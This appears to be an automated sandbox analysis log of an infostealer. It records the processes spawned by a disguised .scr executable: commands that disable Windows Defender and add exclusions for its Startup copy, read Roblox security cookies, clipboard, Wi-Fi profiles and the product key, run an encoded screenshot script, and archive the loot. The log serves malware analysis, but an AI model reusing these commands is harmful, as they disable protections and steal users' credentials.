              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
